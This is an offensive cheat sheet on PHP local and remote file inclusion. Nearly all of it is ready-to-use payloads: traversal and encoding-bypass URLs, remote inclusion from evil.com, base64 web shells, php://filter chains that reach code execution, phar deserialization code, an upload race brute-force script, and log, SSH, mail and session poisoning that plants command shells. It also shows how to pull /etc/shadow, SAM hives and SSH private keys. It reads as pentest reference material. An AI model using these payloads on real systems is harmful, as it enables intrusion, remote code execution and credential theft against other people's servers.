Skip to content

File Inclusion

A File Inclusion Vulnerability refers to a type of security vulnerability in web applications, particularly prevalent in applications developed in PHP, where an attacker can include a file, usually exploiting a lack of proper input/output sanitization. This vulnerability can lead to a range of malicious activities, including code execution, data theft, and website defacement.

File Inclusion Vulnerability should be differenciated from Path Traversal. The Path Traversal vulnerability allows an attacker to access a file, usually exploiting a "reading" mechanism implemented in the target application, when the File Inclusion will lead to the execution of arbitrary code.

Summary

Tools

Local File Inclusion

Consider a PHP script that includes a file based on user input. If proper sanitization is not in place, an attacker could manipulate the page parameter to include local or remote files, leading to unauthorized access or code execution.

<?php
$file = $_GET['page'];
include($file);
?>

In the following examples we include the /etc/passwd file, check the Directory & Path Traversal chapter for more interesting files.

http://example.com/index.php?page=../../../etc/passwd

Null byte

⚠ In versions of PHP below 5.3.4 we can terminate with null byte.

http://example.com/index.php?page=../../../etc/passwd%00

Double encoding

http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

UTF-8 encoding

http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
http://example.com/index.php?page=%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00

Path and dot truncation

On most PHP installations a filename longer than 4096 bytes will be cut off so any excess chars will be thrown away.

http://example.com/index.php?page=../../../etc/passwd............[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd\.\.\.\.\.\.[ADD MORE]
http://example.com/index.php?page=../../../etc/passwd/./././././.[ADD MORE] 
http://example.com/index.php?page=../../../[ADD MORE]../../../../etc/passwd

Filter bypass tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd

Remote File Inclusion

Remote File Inclusion (RFI) is a type of vulnerability that occurs when an application includes a remote file, usually through user input, without properly validating or sanitizing the input.

Remote File Inclusion doesn't work anymore on a default configuration since allow_url_include is now disabled since PHP5.

allow_url_include = On

Most of the filter bypasses from LFI section can be reused for RFI.

http://example.com/index.php?page=http://evil.com/shell.txt

Null byte

http://example.com/index.php?page=http://evil.com/shell.txt%00

Double encoding

http://example.com/index.php?page=http:%252f%252fevil.com%252fshell.txt

Bypass allow_url_include

When allow_url_include and allow_url_fopen are set to Off. It is still possible to include a remote file on Windows box using the smb protocol.

  1. Create a share open to everyone
  2. Write a PHP code inside a file : shell.php
  3. Include it http://example.com/index.php?page=\\10.0.0.1\share\shell.php

LFI / RFI using wrappers

Wrapper php://filter

The part "php://filter" is case insensitive

http://example.com/index.php?page=php://filter/read=string.rot13/resource=index.php
http://example.com/index.php?page=php://filter/convert.iconv.utf-8.utf-16/resource=index.php
http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php
http://example.com/index.php?page=pHp://FilTer/convert.base64-encode/resource=index.php

Wrappers can be chained with a compression wrapper for large files.

http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd

NOTE: Wrappers can be chained multiple times using | or /: - Multiple base64 decodes: php://filter/convert.base64-decoder|convert.base64-decode|convert.base64-decode/resource=%s - deflate then base64encode (useful for limited character exfil): php://filter/zlib.deflate/convert.base64-encode/resource=/var/www/html/index.php

./kadimus -u "http://example.com/index.php?page=vuln" -S -f "index.php%00" -O index.php --parameter page 
curl "http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index.php" | base64 -d > index.php

Also there is a way to turn the php://filter into a full RCE.

  • synacktiv/php_filter_chain_generator - A CLI to generate PHP filters chain
    $ python3 php_filter_chain_generator.py --chain '<?php phpinfo();?>'
    [+] The following gadget chain will generate the following code : <?php phpinfo();?> (base64 value: PD9waHAgcGhwaW5mbygpOz8+)
    php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.UCS-2.UTF8|convert.iconv.L6.UTF8|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.CP1163.CSA_T500|convert.iconv.UCS-2.MSCP949|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp
    
  • LFI2RCE.py to generate a custom payload.
    # vulnerable file: index.php
    # vulnerable parameter: file
    # executed command: id
    # executed PHP code: <?=`$_GET[0]`;;?>
    curl "127.0.0.1:8000/index.php?0=id&file=php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.IEC_P271.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.EUCTW|convert.iconv.L4.UTF8|convert.iconv.866.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L3.T.61|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UJIS|convert.iconv.852.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.851.UTF8|convert.iconv.L7.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.CP1133.IBM932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.851.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.1046.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L7.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.ISO-IR-111.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.ISO6937.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.SJIS.GBK|convert.iconv.L10.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.UCS-2LE.UCS-2BE|convert.iconv.TCVN.UCS2|convert.iconv.857.SHIFTJISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=/etc/passwd"
    

Wrapper data://

http://example.net/?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4=
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"

Fun fact: you can trigger an XSS and bypass the Chrome Auditor with : http://example.com/index.php?page=data:application/x-httpd-php;base64,PHN2ZyBvbmxvYWQ9YWxlcnQoMSk+

Wrapper expect://

http://example.com/index.php?page=expect://id
http://example.com/index.php?page=expect://ls

Wrapper input://

Specify your payload in the POST parameters, this can be done with a simple curl command.

curl -X POST --data "<?php echo shell_exec('id'); ?>" "https://example.com/index.php?page=php://input%00" -k -v

Alternatively, Kadimus has a module to automate this attack.

./kadimus -u "https://example.com/index.php?page=php://input%00"  -C '<?php echo shell_exec("id"); ?>' -T input

Wrapper zip://

  1. Create an evil payload: echo "<pre><?php system($_GET['cmd']); ?></pre>" > payload.php;
  2. Zip the file
    zip payload.zip payload.php;
    mv payload.zip shell.jpg;
    rm payload.php
    
  3. Upload the archive and access the file using the wrappers: http://example.com/index.php?page=zip://shell.jpg%23payload.php

Wrapper phar://

PHAR archive structure

PHAR files work like ZIP files, when you can use the phar:// to access files stored inside them.

  1. Create a phar archive containing a backdoor file: php --define phar.readonly=0 archive.php
<?php
  $phar = new Phar('archive.phar');
  $phar->startBuffering();
  $phar->addFromString('test.txt', '<?php phpinfo(); ?>');
  $phar->setStub('<?php __HALT_COMPILER(); ?>');
  $phar->stopBuffering();
?>
  1. Use the phar:// wrapper: curl http://127.0.0.1:8001/?page=phar:///var/www/html/archive.phar/test.txt

PHAR deserialization

⚠ This technique doesn't work on PHP 8+, the deserialization has been removed.

If a file operation is now performed on our existing phar file via the phar:// wrapper, then its serialized meta data is unserialized. This vulnerability occurs in the following functions, including file_exists: include, file_get_contents, file_put_contents, copy, file_exists, is_executable, is_file, is_dir, is_link, is_writable, fileperms, fileinode, filesize, fileowner, filegroup, fileatime, filemtime, filectime, filetype, getimagesize, exif_read_data, stat, lstat, touch, md5_file, etc.

This exploit requires at least one class with magic methods such as __destruct() or __wakeup(). Let's take this AnyClass class as example, which execute the parameter data.

class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }

    function __destruct() {
        system($this->data);
    }
}

...
echo file_exists($_GET['page']);

We can craft a phar archive containing a serialized object in its meta-data.

// create new Phar
$phar = new Phar('deser.phar');
$phar->startBuffering();
$phar->addFromString('test.txt', 'text');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

// add object of any class as meta data
class AnyClass {
    public $data = null;
    public function __construct($data) {
        $this->data = $data;
    }

    function __destruct() {
        system($this->data);
    }
}
$object = new AnyClass('whoami');
$phar->setMetadata($object);
$phar->stopBuffering();

Finally call the phar wrapper: curl http://127.0.0.1:8001/?page=phar:///var/www/html/deser.phar

NOTE: you can use the $phar->setStub() to add the magic bytes of JPG file: \xff\xd8\xff

$phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");

Wrapper convert.iconv:// and dechunk://

Leak file content from error-based oracle

  • convert.iconv://: convert input into another folder (convert.iconv.utf-16le.utf-8)
  • dechunk://: if the string contains no newlines, it will wipe the entire string if and only if the string starts with A-Fa-f0-9

The goal of this exploitation is to leak the content of a file, one character at a time, based on the DownUnderCTF writeup.

Requirements: - Backend must not use file_exists or is_file. - Vulnerable parameter should be in a POST request. - You can't leak more than 135 characters in a GET request due to the size limit

The exploit chain is based on PHP filters: iconv and dechunk:

  1. Use the iconv filter with an encoding increasing the data size exponentially to trigger a memory error.
  2. Use the dechunk filter to determine the first character of the file, based on the previous error.
  3. Use the iconv filter again with encodings having different bytes ordering to swap remaining characters with the first one.

Exploit using synacktiv/php_filter_chains_oracle_exploit, the script will use either the HTTP status code: 500 or the time as an error-based oracle to determine the character.

$ python3 filters_chain_oracle_exploit.py --target http://127.0.0.1 --file '/test' --parameter 0   
[*] The following URL is targeted : http://127.0.0.1
[*] The following local file is leaked : /test
[*] Running POST requests
[+] File /test leak is finished!

Leak file content inside a custom format output

  • ambionics/wrapwrap - Generates a php://filter chain that adds a prefix and a suffix to the contents of a file.

To obtain the contents of some file, we would like to have: {"message":"<file contents>"}.

./wrapwrap.py /etc/passwd 'PREFIX' 'SUFFIX' 1000
./wrapwrap.py /etc/passwd '{"message":"' '"}' 1000
./wrapwrap.py /etc/passwd '<root><name>' '</name></root>' 1000

This can be used against vulnerable code like the following.

<?php
  $data = file_get_contents($_POST['url']);
  $data = json_decode($data);
  echo $data->message;
?>

LFI to RCE via /proc/*/fd

  1. Upload a lot of shells (for example : 100)
  2. Include http://example.com/index.php?page=/proc/$PID/fd/$FD, with $PID = PID of the process (can be bruteforced) and $FD the filedescriptor (can be bruteforced too)

LFI to RCE via /proc/self/environ

Like a log file, send the payload in the User-Agent, it will be reflected inside the /proc/self/environ file

GET vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

LFI to RCE via iconv

Use the iconv wrapper to trigger an OOB in the glibc (CVE-2024-2961), then use your LFI to read the memory regions from /proc/self/maps and to download the glibc binary. Finally you get the RCE by exploiting the zend_mm_heap structure to call a free() that have been remapped to system using custom_heap._free.

Requirements:

  • PHP 7.0.0 (2015) to 8.3.7 (2024)
  • GNU C Library (glibc) <= 2.39
  • Access to convert.iconv, zlib.inflate, dechunk filters

Exploit:

LFI to RCE via upload

If you can upload a file, just inject the shell payload in it (e.g : <?php system($_GET['c']); ?> ).

http://example.com/index.php?page=path/to/uploaded/file.png

In order to keep the file readable it is best to inject into the metadata for the pictures/doc/pdf

LFI to RCE via upload (race)

  • Upload a file and trigger a self-inclusion.
  • Repeat the upload a shitload of time to:
  • increase our odds of winning the race
  • increase our guessing odds
  • Bruteforce the inclusion of /tmp/[0-9a-zA-Z]{6}
  • Enjoy our shell.
import itertools
import requests
import sys

print('[+] Trying to win the race')
f = {'file': open('shell.php', 'rb')}
for _ in range(4096 * 4096):
    requests.post('http://target.com/index.php?c=index.php', f)


print('[+] Bruteforcing the inclusion')
for fname in itertools.combinations(string.ascii_letters + string.digits, 6):
    url = 'http://target.com/index.php?c=/tmp/php' + fname
    r = requests.get(url)
    if 'load average' in r.text:  # <?php echo system('uptime');
        print('[+] We have got a shell: ' + url)
        sys.exit(0)

print('[x] Something went wrong, please try again')

LFI to RCE via upload (FindFirstFile)

⚠ Only works on Windows

FindFirstFile allows using masks (<< as * and > as ?) in LFI paths on Windows. A mask is essentially a search pattern that can include wildcard characters, allowing users or developers to search for files or directories based on partial names or types. In the context of FindFirstFile, masks are used to filter and match the names of files or directories.

  • */<< : Represents any sequence of characters.
  • ?/> : Represents any single character.

Upload a file, it should be stored in the temp folder C:\Windows\Temp\ with a generated name like php[A-F0-9]{4}.tmp. Then either bruteforce the 65536 filenames or use a wildcard character like: http://site/vuln.php?inc=c:\windows\temp\php<<

LFI to RCE via phpinfo()

PHPinfo() displays the content of any variables such as $_GET, $_POST and $_FILES.

By making multiple upload posts to the PHPInfo script, and carefully controlling the reads, it is possible to retrieve the name of the temporary file and make a request to the LFI script specifying the temporary file name.

Use the script phpInfoLFI.py

Research from https://www.insomniasec.com/downloads/publications/LFI%20With%20PHPInfo%20Assistance.pdf

LFI to RCE via controlled log file

Just append your PHP code into the log file by doing a request to the service (Apache, SSH..) and include the log file.

http://example.com/index.php?page=/var/log/apache/access.log
http://example.com/index.php?page=/var/log/apache/error.log
http://example.com/index.php?page=/var/log/apache2/access.log
http://example.com/index.php?page=/var/log/apache2/error.log
http://example.com/index.php?page=/var/log/nginx/access.log
http://example.com/index.php?page=/var/log/nginx/error.log
http://example.com/index.php?page=/var/log/vsftpd.log
http://example.com/index.php?page=/var/log/sshd.log
http://example.com/index.php?page=/var/log/mail
http://example.com/index.php?page=/var/log/httpd/error_log
http://example.com/index.php?page=/usr/local/apache/log/error_log
http://example.com/index.php?page=/usr/local/apache2/log/error_log

RCE via SSH

Try to ssh into the box with a PHP code as username <?php system($_GET["cmd"]);?>.

ssh <?php system($_GET["cmd"]);?>@10.10.10.10

Then include the SSH log files inside the Web Application.

http://example.com/index.php?page=/var/log/auth.log&cmd=id

RCE via Mail

First send an email using the open SMTP then include the log file located at http://example.com/index.php?page=/var/log/mail.

root@kali:~# telnet 10.10.10.10. 25
Trying 10.10.10.10....
Connected to 10.10.10.10..
Escape character is '^]'.
220 straylight ESMTP Postfix (Debian/GNU)
helo ok
250 straylight
mail from: mail@example.com
250 2.1.0 Ok
rcpt to: root
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
subject: <?php echo system($_GET["cmd"]); ?>
data2
.

In some cases you can also send the email with the mail command line.

mail -s "<?php system($_GET['cmd']);?>" www-data@10.10.10.10. < /dev/null

RCE via Apache logs

Poison the User-Agent in access logs:

$ curl http://example.org/ -A "<?php system(\$_GET['cmd']);?>"

Note: The logs will escape double quotes so use single quotes for strings in the PHP payload.

Then request the logs via the LFI and execute your command.

$ curl http://example.org/test.php?page=/var/log/apache2/access.log&cmd=id

LFI to RCE via PHP sessions

Check if the website use PHP Session (PHPSESSID)

Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27; path=/
Set-Cookie: user=admin; expires=Mon, 13-Aug-2018 20:21:29 GMT; path=/; httponly

In PHP these sessions are stored into /var/lib/php5/sess_[PHPSESSID] or /var/lib/php/sessions/sess_[PHPSESSID] files

/var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27.
user_ip|s:0:"";loggedin|s:0:"";lang|s:9:"en_us.php";win_lin|s:0:"";user|s:6:"admin";pass|s:6:"admin";

Set the cookie to <?php system('cat /etc/passwd');?>

login=1&user=<?php system("cat /etc/passwd");?>&pass=password&lang=en_us.php

Use the LFI to include the PHP session file

login=1&user=admin&pass=password&lang=/../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27

LFI to RCE via PHP PEARCMD

PEAR is a framework and distribution system for reusable PHP components. By default pearcmd.php is installed in every Docker PHP image from hub.docker.com in /usr/local/lib/php/pearcmd.php.

The file pearcmd.php uses $_SERVER['argv'] to get its arguments. The directive register_argc_argv must be set to On in PHP configuration (php.ini) for this attack to work.

register_argc_argv = On

There are this ways to exploit it.

  • Method 1: config create

    /vuln.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=eval($_GET['cmd'])?>+/tmp/exec.php
    /vuln.php?file=/tmp/exec.php&cmd=phpinfo();die();
    

  • Method 2: man_dir

    /vuln.php?file=/usr/local/lib/php/pearcmd.php&+-c+/tmp/exec.php+-d+man_dir=<?echo(system($_GET['c']));?>+-s+
    /vuln.php?file=/tmp/exec.php&c=id
    
    The created configuration file contains the webshell.
    #PEAR_Config 0.9
    a:2:{s:10:"__channels";a:2:{s:12:"pecl.php.net";a:0:{}s:5:"__uri";a:0:{}}s:7:"man_dir";s:29:"<?echo(system($_GET['c']));?>";}
    

  • Method 3: download (need external network connection).

    /vuln.php?file=/usr/local/lib/php/pearcmd.php&+download+http://<ip>:<port>/exec.php
    /vuln.php?file=exec.php&c=id
    

  • Method 4: install (need external network connection). Notice that exec.php locates at /tmp/pear/download/exec.php.

    /vuln.php?file=/usr/local/lib/php/pearcmd.php&+install+http://<ip>:<port>/exec.php
    /vuln.php?file=/tmp/pear/download/exec.php&c=id
    

LFI to RCE via credentials files

This method require high privileges inside the application in order to read the sensitive files.

Windows version

First extract sam and system files.

http://example.com/index.php?page=../../../../../../WINDOWS/repair/sam
http://example.com/index.php?page=../../../../../../WINDOWS/repair/system

Then extract hashes from these files samdump2 SYSTEM SAM > hashes.txt, and crack them with hashcat/john or replay them using the Pass The Hash technique.

Linux version

First extract /etc/shadow files.

http://example.com/index.php?page=../../../../../../etc/shadow

Then crack the hashes inside in order to login via SSH on the machine.

Another way to gain SSH access to a Linux machine through LFI is by reading the private key file, id_rsa. If SSH is active check which user is being used /proc/self/status and /etc/passwd and try to access /<HOME>/.ssh/id_rsa.

References